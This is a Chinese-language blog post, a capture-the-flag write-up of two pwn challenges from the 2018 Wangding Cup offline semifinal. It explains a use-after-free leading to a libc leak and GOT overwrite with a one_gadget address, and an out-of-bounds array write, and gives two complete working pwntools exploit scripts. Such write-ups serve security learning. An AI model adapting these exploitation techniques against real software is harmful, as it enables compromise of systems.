<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn," />










<meta name="description" content="pwn1本题的逻辑和线上的EasyCoin还是很像的，但是有些蜜汁逻辑真的看着难受。 基本逻辑 regist函数在ptr数组中找到一个空闲的位置，ptr中每个地址都是一个0x130大小的块，注册后的结构如下：  12345678struct user&amp;#123;    char *name;    int age;    char des[256];    char *msg_list;    s">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2018网鼎杯线下半决赛pwn">
<meta property="og:url" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/index.html">
<meta property="og:site_name" content="0gur1">
<meta property="og:description" content="pwn1本题的逻辑和线上的EasyCoin还是很像的，但是有些蜜汁逻辑真的看着难受。 基本逻辑 regist函数在ptr数组中找到一个空闲的位置，ptr中每个地址都是一个0x130大小的块，注册后的结构如下：  12345678struct user&amp;#123;    char *name;    int age;    char des[256];    char *msg_list;    s">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/menu.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/regist.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/login.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/view_profile.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/update.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/friend.png">
<meta property="og:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/send.png">
<meta property="og:updated_time" content="2018-09-09T09:09:50.965Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018网鼎杯线下半决赛pwn">
<meta name="twitter:description" content="pwn1本题的逻辑和线上的EasyCoin还是很像的，但是有些蜜汁逻辑真的看着难受。 基本逻辑 regist函数在ptr数组中找到一个空闲的位置，ptr中每个地址都是一个0x130大小的块，注册后的结构如下：  12345678struct user&amp;#123;    char *name;    int age;    char des[256];    char *msg_list;    s">
<meta name="twitter:image" content="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/menu.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
	  applicationID: '7MHLMVVD1M',
      apiKey: 'dbb74cd528079f8c1d1a6138e9ed5b67',
      indexName: 'test_hexo',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/"/>





  <title>2018网鼎杯线下半决赛pwn | 0gur1</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">0gur1</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  <!-- -->
  
  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
		  
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0gur1.cc/2018/09/09/2018网鼎杯线下半决赛pwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="0gur1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="0gur1">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2018网鼎杯线下半决赛pwn</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-09T15:35:45+08:00">
                2018-09-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2018/09/09/2018网鼎杯线下半决赛pwn/" class="leancloud_visitors" data-flag-title="2018网鼎杯线下半决赛pwn">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1,367字
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="pwn1"><a href="#pwn1" class="headerlink" title="pwn1"></a>pwn1</h1><p>本题的逻辑和线上的EasyCoin还是很像的，但是有些蜜汁逻辑真的看着难受。</p>
<h2 id="基本逻辑"><a href="#基本逻辑" class="headerlink" title="基本逻辑"></a>基本逻辑</h2><p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/menu.png" alt="主要功能"></p>
<p>regist函数在ptr数组中找到一个空闲的位置，ptr中每个地址都是一个0x130大小的块，注册后的结构如下：</p>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/regist.png" alt="regist函数主要代码"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">user</span>&#123;</span></span><br><span class="line">    <span class="keyword">char</span> *name;</span><br><span class="line">    <span class="keyword">int</span> age;</span><br><span class="line">    <span class="keyword">char</span> des[<span class="number">256</span>];</span><br><span class="line">    <span class="keyword">char</span> *msg_list;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">user</span> *<span class="title">next</span>;</span></span><br><span class="line">    <span class="keyword">bool</span> inuse;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>login函数简单粗暴的查找username，然后登入。</p>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/login.png" alt="login函数主要代码"></p>
<p>view_profile打印出用户名、年龄和描述信息。</p>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/view_profile.png" alt="view_profile函数"></p>
<p>update更新用户名、年龄和描述信息，非常坑的是，更新用户名时<strong>只能再输入strlen(username)长度</strong>的字符。</p>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/update.png" alt="update函数"></p>
<p>friend函数可以删除或者添加一个friend。删除时，沿着next找到要删除的user。添加时，沿着next找到最后一个结点并添加。忍住不吐槽这个破函数……忍住…….  这里可以添加自己为friend</p>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/friend.png" alt="friend函数"></p>
<p>send函数发送msg，每次send之前要构造一个msg结构体,msg的结构体如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">msg</span>&#123;</span></span><br><span class="line">    <span class="keyword">char</span> *title;</span><br><span class="line">    <span class="keyword">char</span> *content;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">msg</span> *<span class="title">next</span>;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里用到的strdup函数相当于：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p = <span class="built_in">malloc</span>(<span class="built_in">strlen</span>(buf));</span><br><span class="line"><span class="built_in">strcpy</span>(p,buf);</span><br></pre></td></tr></table></figure>
<p><img src="/2018/09/09/2018网鼎杯线下半决赛pwn/send.png" alt="send函数"></p>
<p>view_msg和logout比较简单，这里就不列出了。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>和EasyCoin一样，本题也可以添加自己为好友，next指针指向自己，删除好友时，相当于释放自己这块内存。而释放后没有将指针置零，UAF漏洞能够泄露地址和覆写got表。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="泄露libc地址"><a href="#泄露libc地址" class="headerlink" title="泄露libc地址"></a>泄露libc地址</h3><p>释放一个user后，它的name字段被覆写为FD，该指针指向main_arena+88。</p>
<h3 id="覆写got表"><a href="#覆写got表" class="headerlink" title="覆写got表"></a>覆写got表</h3><p>当重新注册一个新用户时，首先在ptr数组中找一个闲置的块，然后按照输入的size，malloc一个块作为name的空间。由于刚刚释放了一个user，unsorted bin中已有一个大小为0x130的块。当输入的size小于0x130时，就会从unsorted bin上分配给name。</p>
<p>此时在name中写入puts@got的地址，即相当覆写已释放的user的name地址为puts@got地址，此时我们再update已释放user，就能向puts@got写入one_gadget地址了。</p>
<h3 id="艰苦的心路历程"><a href="#艰苦的心路历程" class="headerlink" title="艰苦的心路历程"></a>艰苦的心路历程</h3><p>虽然本题利用很简单，但是！！我踩了好多坑！！</p>
<p>思路一：把已释放user的name字段覆写为malloc_hook的地址，再update，试图向malloc_hook中写入one_gadget。然而！update时用到了strlen！而strlen(&amp;__malloc_hook)的值为0，也就是根本写不进去</p>
<p>思路二：泄露libc也可以通过environ变量泄露栈地址，覆写函数返回地址为one_gadget。再一次被update阻拦了，栈中的返回地址长度都为3（如0x400ebe）。又想是否能够修改main函数的返回地址？发现main函数是通过exit退出的，没有leave;ret环节。</p>
<p>思路三：向FD所指的main_arena+88中写入got表地址，由于main_arena+88恰好是记录top地址的位置，覆写成got表，之后的malloc会从got表中分配并可以覆写got表。然而，update还必须要输入age，age处对应了BK指针，为了保证能够正常分配块，age也应该保持main_arena+88，但是update对age进行了截断，只复制后四字节然后自行填充，就不能把完整的地址写入BK处。</p>
<h2 id="利用脚本"><a href="#利用脚本" class="headerlink" title="利用脚本"></a>利用脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./pwn1'</span>)</span><br><span class="line">gadget=[<span class="number">0x45216</span>,<span class="number">0x4526a</span>,<span class="number">0xf02a4</span>,<span class="number">0xf1147</span>]</span><br><span class="line">puts_got = <span class="number">0x602020</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">(name)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'1'</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Please input your user name:"</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">regist</span><span class="params">(name,size,age,des)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'2'</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your name size:"</span>,str(size))	</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your name:"</span>,name)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your age:"</span>,str(age))</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your description:"</span>,des)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">view_info</span><span class="params">()</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span><span class="params">(name,age,des)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'2'</span>)</span><br><span class="line">	p.sendafter(<span class="string">"Input your name:"</span>,name)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your age:"</span>,str(age))</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your description:"</span>,des)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_friend</span><span class="params">(name)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'3'</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input the friend's name:"</span>,name)	</span><br><span class="line">	p.sendlineafter(<span class="string">"So..Do u want to add or delete this friend?(a/d)"</span>,<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele_friend</span><span class="params">(name)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'3'</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input the friend's name:"</span>,name)	</span><br><span class="line">	p.sendlineafter(<span class="string">"So..Do u want to add or delete this friend?(a/d)"</span>,<span class="string">'d'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">send</span><span class="params">(name,title,content)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'4'</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Which user do you want to send a msg to:"</span>,name)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your message title:"</span>,title)</span><br><span class="line">	p.sendlineafter(<span class="string">"Input your content:"</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span><span class="params">()</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Your choice:"</span>,<span class="string">'6'</span>)</span><br><span class="line"></span><br><span class="line">regist(<span class="string">"0gur11"</span>,<span class="number">8</span>,<span class="number">22</span>,<span class="string">"0gur111"</span>)</span><br><span class="line">regist(<span class="string">"0gur22"</span>,<span class="number">64</span>,<span class="number">22</span>,<span class="string">"0gur222"</span>)</span><br><span class="line"></span><br><span class="line">login(<span class="string">"0gur22"</span>)</span><br><span class="line">add_friend(<span class="string">"0gur22"</span>)</span><br><span class="line">dele_friend(<span class="string">"0gur22"</span>)</span><br><span class="line"></span><br><span class="line">view_info()</span><br><span class="line">p.recvuntil(<span class="string">"Username:"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak libc</span></span><br><span class="line">heap = p.recvline()[:<span class="number">-1</span>]</span><br><span class="line">heap_len = len(heap)</span><br><span class="line">heap_addr = u64(heap.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">p.recvuntil(<span class="string">"Age:"</span>)</span><br><span class="line">addr = int(p.recvline()[:<span class="number">-1</span>],<span class="number">16</span>)</span><br><span class="line">libc_base = addr - <span class="number">3951480</span></span><br><span class="line">puts_addr = libc_base + <span class="number">456336</span></span><br><span class="line">log.info(<span class="string">'libc_base:%#x'</span>,libc_base)</span><br><span class="line">log.info(<span class="string">'heap_addr:%#x'</span>,heap_addr)</span><br><span class="line">logout()</span><br><span class="line"></span><br><span class="line"><span class="comment">#rewrite got</span></span><br><span class="line">regist(p64(puts_got),<span class="number">0x20</span>,<span class="number">22</span>,<span class="string">"0gur333"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">login(p64(puts_addr))</span><br><span class="line">update(p64(libc_base+gadget[<span class="number">0</span>])[:<span class="number">-2</span>],<span class="number">23</span>,<span class="string">"0gur222"</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h1><p>pwn2还是挺简单的，存在数组越界漏洞，而且该数组还是在bss段上，因此可以泄露stderr的地址进而泄露libc地址；另外bss离got也很近，可以覆写got表。</p>
<p>附上脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">	p = process(<span class="string">'./pwn2'</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">exit_got = <span class="number">0x602060</span></span><br><span class="line">gadget =[<span class="number">0x45216</span>,<span class="number">0x4526a</span>,<span class="number">0xf02a4</span>,<span class="number">0xf1147</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">'b *0x4009a9'</span>)</span><br><span class="line">payload = <span class="number">0x19</span> *<span class="string">'&lt;'</span>+ <span class="string">'+.'</span>+<span class="string">'&lt;+.'</span>*<span class="number">7</span> + <span class="number">0x40</span>*<span class="string">'&lt;'</span>+<span class="string">','</span>+<span class="string">'&gt;,'</span>*<span class="number">7</span></span><br><span class="line">p.recvuntil(<span class="string">"Put the code: "</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">stderr_addr = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#leak libc</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	c = ord(p.recv(<span class="number">1</span>))<span class="number">-1</span></span><br><span class="line">	stderr_addr += c &lt;&lt; (<span class="number">7</span>-i)*<span class="number">8</span></span><br><span class="line">log.info(<span class="string">"stderr:%#x"</span>,stderr_addr)</span><br><span class="line">libc_base = stderr_addr - <span class="number">3953984</span></span><br><span class="line">one_gadget = libc_base + gadget[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#sys_addr = stderr_addr - 3670896</span></span><br><span class="line">log.info(<span class="string">"one_gadget:%#x"</span>,one_gadget)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">8</span>):</span><br><span class="line">	p.send(p64(one_gadget)[i])</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/30/工具安装及使用/" rel="next" title="工具安装及使用">
                <i class="fa fa-chevron-left"></i> 工具安装及使用
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/uploads/avatar.jpg"
                alt="0gur1" />
            
              <p class="site-author-name" itemprop="name">0gur1</p>
              <p class="site-description motion-element" itemprop="description">Stay hungry.Stay foolish.</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn1"><span class="nav-number">1.</span> <span class="nav-text">pwn1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本逻辑"><span class="nav-number">1.1.</span> <span class="nav-text">基本逻辑</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞利用"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#泄露libc地址"><span class="nav-number">1.3.1.</span> <span class="nav-text">泄露libc地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#覆写got表"><span class="nav-number">1.3.2.</span> <span class="nav-text">覆写got表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#艰苦的心路历程"><span class="nav-number">1.3.3.</span> <span class="nav-text">艰苦的心路历程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用脚本"><span class="nav-number">1.4.</span> <span class="nav-text">利用脚本</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn2"><span class="nav-number">2.</span> <span class="nav-text">pwn2</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">0gur1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>



<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客量:<span id="busuanzi_value_site_uv"></span>
</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

